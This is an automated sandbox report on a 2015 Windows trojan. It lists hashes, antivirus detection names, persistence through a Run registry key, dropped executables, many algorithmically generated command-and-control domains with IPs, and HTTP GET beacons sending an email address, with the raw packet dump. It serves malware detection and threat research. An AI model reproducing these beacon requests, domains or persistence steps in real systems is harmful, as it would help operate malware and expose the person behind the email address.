Analysis Date | 2015-08-19 08:51:27 |
---|---|
MD5 | 55f9a1f3bd4b6588aeca4d4bd0066da3 |
SHA1 | 4beb2faeb107e228931427160814de8837fe6260 |
Static Details:
File type | PE32 executable for MS Windows (GUI) Intel 80386 32-bit | |
---|---|---|
Section | .text md5: 96433aeb8b7de9e599af5116e5320285 sha1: ee53c735b0c78cb802abe8802f7c815eee1be251 size: 299520 | |
Section | .rdata md5: 72a9439c6ff087869accd32be38242de sha1: ab512634b7385628eec7a1b37254156c72d303a1 size: 34304 | |
Section | .data md5: 5ff41039ae47da11ba6b8ce9ef79591c sha1: bda18c8b4034f7c4f2fb8365a2508bbe4317519e size: 98304 | |
Timestamp | 2014-10-30 10:10:32 | |
Packer | Microsoft Visual C++ ?.? | |
PEhash | bf684f27c3e73973ff5dd5ac228c5391d4d6cbc4 | |
IMPhash | 69e8bc9396189de1eb5059fccc3bf34d | |
AV | CA (E-Trust Ino) | Heur/Downloader.ZALU!suspicious |
AV | F-Secure | Gen:Variant.Symmi.22722 |
AV | Dr. Web | Trojan.DownLoader15.32945 |
AV | ClamAV | no_virus |
AV | Arcabit (arcavir) | Gen:Variant.Symmi.22722 |
AV | BullGuard | Gen:Variant.Symmi.22722 |
AV | Padvish | no_virus |
AV | VirusBlokAda (vba32) | no_virus |
AV | CAT (quickheal) | Trojan.Dynamer.AC3 |
AV | Trend Micro | TROJ_FORUCON.BMC |
AV | Kaspersky | Trojan.Win32.Generic |
AV | Zillya! | no_virus |
AV | Emsisoft | Gen:Variant.Symmi.22722 |
AV | Ikarus | Trojan.FBAccountLock |
AV | Frisk (f-prot) | no_virus |
AV | Authentium | W32/Wonton.B.gen!Eldorado |
AV | MalwareBytes | Trojan.Zbot.WHE |
AV | MicroWorld (escan) | Gen:Variant.Symmi.22722 |
AV | Microsoft Security Essentials | TrojanSpy:Win32/Nivdort.BD |
AV | K7 | Trojan ( 004cb2771 ) |
AV | BitDefender | Gen:Variant.Symmi.22722 |
AV | Fortinet | W32/Agent.VNC!tr |
AV | Symantec | Downloader.Upatre!g15 |
AV | Grisoft (avg) | Win32/Cryptor |
AV | Eset (nod32) | Win32/Agent.VNC |
AV | Alwil (avast) | Downloader-TLD [Trj] |
AV | Ad-Aware | Gen:Variant.Symmi.22722 |
AV | Twister | no_virus |
AV | Avira (antivir) | BDS/Zegost.Gen4 |
AV | Mcafee | Trojan-FEMT!55F9A1F3BD4B |
AV | Rising | 0x58ef8c3a |
Runtime Details:
Screenshot | ![]() |
---|
Process
↳ C:\malware.exe
Registry | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Function Ordering Video Software ➝ C:\Documents and Settings\Administrator\Application Data\qeerarcddwnr\olwprialx.exe |
---|---|
Creates File | C:\Documents and Settings\Administrator\Application Data\qeerarcddwnr\olwprialx.exe |
Creates Process | C:\Documents and Settings\Administrator\Application Data\qeerarcddwnr\olwprialx.exe |
Process
↳ C:\Documents and Settings\Administrator\Application Data\qeerarcddwnr\olwprialx.exe
Creates File | C:\Documents and Settings\Administrator\Application Data\qeerarcddwnr\olwprialx.vogp |
---|---|
Creates File | \Device\Afd\Endpoint |
Creates File | C:\Documents and Settings\Administrator\Application Data\qeerarcddwnr\xicogfhng.exe |
Creates Process | WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\qeerarcddwnr\olwprialx.exe" |
Process
↳ WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\qeerarcddwnr\olwprialx.exe"
Network Details:
DNS | simpleoffice.net Type: A 50.63.202.104 |
---|---|
DNS | mountainsupply.net Type: A 67.18.199.2 |
DNS | windowsupply.net Type: A 173.236.172.44 |
DNS | sweetoffice.net Type: A 162.213.251.173 |
DNS | materialsupply.net Type: A 184.168.221.36 |
DNS | laughstrong.net Type: A 50.21.189.209 |
DNS | severaoffice.net Type: A |
DNS | laughoffice.net Type: A |
DNS | severaarrive.net Type: A |
DNS | laugharrive.net Type: A |
DNS | simplesupply.net Type: A |
DNS | mothersupply.net Type: A |
DNS | simpledistance.net Type: A |
DNS | motherdistance.net Type: A |
DNS | motheroffice.net Type: A |
DNS | simplearrive.net Type: A |
DNS | motherarrive.net Type: A |
DNS | possiblesupply.net Type: A |
DNS | mountaindistance.net Type: A |
DNS | possibledistance.net Type: A |
DNS | mountainoffice.net Type: A |
DNS | possibleoffice.net Type: A |
DNS | mountainarrive.net Type: A |
DNS | possiblearrive.net Type: A |
DNS | perhapssupply.net Type: A |
DNS | perhapsdistance.net Type: A |
DNS | windowdistance.net Type: A |
DNS | perhapsoffice.net Type: A |
DNS | windowoffice.net Type: A |
DNS | perhapsarrive.net Type: A |
DNS | windowarrive.net Type: A |
DNS | wintersupply.net Type: A |
DNS | subjectsupply.net Type: A |
DNS | winterdistance.net Type: A |
DNS | subjectdistance.net Type: A |
DNS | winteroffice.net Type: A |
DNS | subjectoffice.net Type: A |
DNS | winterarrive.net Type: A |
DNS | subjectarrive.net Type: A |
DNS | finishsupply.net Type: A |
DNS | leavesupply.net Type: A |
DNS | finishdistance.net Type: A |
DNS | leavedistance.net Type: A |
DNS | finishoffice.net Type: A |
DNS | leaveoffice.net Type: A |
DNS | finisharrive.net Type: A |
DNS | leavearrive.net Type: A |
DNS | sweetsupply.net Type: A |
DNS | probablysupply.net Type: A |
DNS | sweetdistance.net Type: A |
DNS | probablydistance.net Type: A |
DNS | probablyoffice.net Type: A |
DNS | sweetarrive.net Type: A |
DNS | probablyarrive.net Type: A |
DNS | severalsupply.net Type: A |
DNS | severaldistance.net Type: A |
DNS | materialdistance.net Type: A |
DNS | severaloffice.net Type: A |
DNS | materialoffice.net Type: A |
DNS | severalarrive.net Type: A |
DNS | materialarrive.net Type: A |
DNS | severastrong.net Type: A |
DNS | severatrouble.net Type: A |
DNS | laughtrouble.net Type: A |
DNS | severapresident.net Type: A |
DNS | laughpresident.net Type: A |
DNS | severacaught.net Type: A |
DNS | laughcaught.net Type: A |
DNS | simplestrong.net Type: A |
DNS | motherstrong.net Type: A |
DNS | simpletrouble.net Type: A |
DNS | mothertrouble.net Type: A |
DNS | simplepresident.net Type: A |
DNS | motherpresident.net Type: A |
DNS | simplecaught.net Type: A |
DNS | mothercaught.net Type: A |
DNS | mountainstrong.net Type: A |
DNS | possiblestrong.net Type: A |
DNS | mountaintrouble.net Type: A |
DNS | possibletrouble.net Type: A |
DNS | mountainpresident.net Type: A |
DNS | possiblepresident.net Type: A |
DNS | mountaincaught.net Type: A |
DNS | possiblecaught.net Type: A |
DNS | perhapsstrong.net Type: A |
HTTP GET | http://simpleoffice.net/index.php?email=amalia_rido@yahoo.com&method=post&len User-Agent: |
HTTP GET | http://mountainsupply.net/index.php?email=amalia_rido@yahoo.com&method=post&len User-Agent: |
HTTP GET | http://windowsupply.net/index.php?email=amalia_rido@yahoo.com&method=post&len User-Agent: |
HTTP GET | http://sweetoffice.net/index.php?email=amalia_rido@yahoo.com&method=post&len User-Agent: |
HTTP GET | http://materialsupply.net/index.php?email=amalia_rido@yahoo.com&method=post&len User-Agent: |
HTTP GET | http://laughstrong.net/index.php?email=amalia_rido@yahoo.com&method=post&len User-Agent: |
Flows TCP | 192.168.1.1:1031 ➝ 50.63.202.104:80 |
Flows TCP | 192.168.1.1:1032 ➝ 67.18.199.2:80 |
Flows TCP | 192.168.1.1:1033 ➝ 173.236.172.44:80 |
Flows TCP | 192.168.1.1:1034 ➝ 162.213.251.173:80 |
Flows TCP | 192.168.1.1:1035 ➝ 184.168.221.36:80 |
Flows TCP | 192.168.1.1:1036 ➝ 50.21.189.209:80 |
Raw Pcap
0x00000000 (00000) 47455420 2f696e64 65782e70 68703f65 GET /index.php?e 0x00000010 (00016) 6d61696c 3d616d61 6c69615f 7269646f mail=amalia_rido 0x00000020 (00032) 40796168 6f6f2e63 6f6d266d 6574686f @yahoo.com&metho 0x00000030 (00048) 643d706f 7374266c 656e2048 5454502f d=post&len HTTP/ 0x00000040 (00064) 312e300d 0a416363 6570743a 202a2f2a 1.0..Accept: */* 0x00000050 (00080) 0d0a436f 6e6e6563 74696f6e 3a20636c ..Connection: cl 0x00000060 (00096) 6f73650d 0a486f73 743a2073 696d706c ose..Host: simpl 0x00000070 (00112) 656f6666 6963652e 6e65740d 0a0d0a eoffice.net.... 0x00000000 (00000) 47455420 2f696e64 65782e70 68703f65 GET /index.php?e 0x00000010 (00016) 6d61696c 3d616d61 6c69615f 7269646f mail=amalia_rido 0x00000020 (00032) 40796168 6f6f2e63 6f6d266d 6574686f @yahoo.com&metho 0x00000030 (00048) 643d706f 7374266c 656e2048 5454502f d=post&len HTTP/ 0x00000040 (00064) 312e300d 0a416363 6570743a 202a2f2a 1.0..Accept: */* 0x00000050 (00080) 0d0a436f 6e6e6563 74696f6e 3a20636c ..Connection: cl 0x00000060 (00096) 6f73650d 0a486f73 743a206d 6f756e74 ose..Host: mount 0x00000070 (00112) 61696e73 7570706c 792e6e65 740d0a0d ainsupply.net... 0x00000080 (00128) 0a . 0x00000000 (00000) 47455420 2f696e64 65782e70 68703f65 GET /index.php?e 0x00000010 (00016) 6d61696c 3d616d61 6c69615f 7269646f mail=amalia_rido 0x00000020 (00032) 40796168 6f6f2e63 6f6d266d 6574686f @yahoo.com&metho 0x00000030 (00048) 643d706f 7374266c 656e2048 5454502f d=post&len HTTP/ 0x00000040 (00064) 312e300d 0a416363 6570743a 202a2f2a 1.0..Accept: */* 0x00000050 (00080) 0d0a436f 6e6e6563 74696f6e 3a20636c ..Connection: cl 0x00000060 (00096) 6f73650d 0a486f73 743a2077 696e646f ose..Host: windo 0x00000070 (00112) 77737570 706c792e 6e65740d 0a0d0a0d wsupply.net..... 0x00000080 (00128) 0a . 0x00000000 (00000) 47455420 2f696e64 65782e70 68703f65 GET /index.php?e 0x00000010 (00016) 6d61696c 3d616d61 6c69615f 7269646f mail=amalia_rido 0x00000020 (00032) 40796168 6f6f2e63 6f6d266d 6574686f @yahoo.com&metho 0x00000030 (00048) 643d706f 7374266c 656e2048 5454502f d=post&len HTTP/ 0x00000040 (00064) 312e300d 0a416363 6570743a 202a2f2a 1.0..Accept: */* 0x00000050 (00080) 0d0a436f 6e6e6563 74696f6e 3a20636c ..Connection: cl 0x00000060 (00096) 6f73650d 0a486f73 743a2073 77656574 ose..Host: sweet 0x00000070 (00112) 6f666669 63652e6e 65740d0a 0d0a0a0d office.net...... 0x00000080 (00128) 0a . 0x00000000 (00000) 47455420 2f696e64 65782e70 68703f65 GET /index.php?e 0x00000010 (00016) 6d61696c 3d616d61 6c69615f 7269646f mail=amalia_rido 0x00000020 (00032) 40796168 6f6f2e63 6f6d266d 6574686f @yahoo.com&metho 0x00000030 (00048) 643d706f 7374266c 656e2048 5454502f d=post&len HTTP/ 0x00000040 (00064) 312e300d 0a416363 6570743a 202a2f2a 1.0..Accept: */* 0x00000050 (00080) 0d0a436f 6e6e6563 74696f6e 3a20636c ..Connection: cl 0x00000060 (00096) 6f73650d 0a486f73 743a206d 61746572 ose..Host: mater 0x00000070 (00112) 69616c73 7570706c 792e6e65 740d0a0d ialsupply.net... 0x00000080 (00128) 0a . 0x00000000 (00000) 47455420 2f696e64 65782e70 68703f65 GET /index.php?e 0x00000010 (00016) 6d61696c 3d616d61 6c69615f 7269646f mail=amalia_rido 0x00000020 (00032) 40796168 6f6f2e63 6f6d266d 6574686f @yahoo.com&metho 0x00000030 (00048) 643d706f 7374266c 656e2048 5454502f d=post&len HTTP/ 0x00000040 (00064) 312e300d 0a416363 6570743a 202a2f2a 1.0..Accept: */* 0x00000050 (00080) 0d0a436f 6e6e6563 74696f6e 3a20636c ..Connection: cl 0x00000060 (00096) 6f73650d 0a486f73 743a206c 61756768 ose..Host: laugh 0x00000070 (00112) 7374726f 6e672e6e 65740d0a 0d0a0a0d strong.net...... 0x00000080 (00128) 0a .
Strings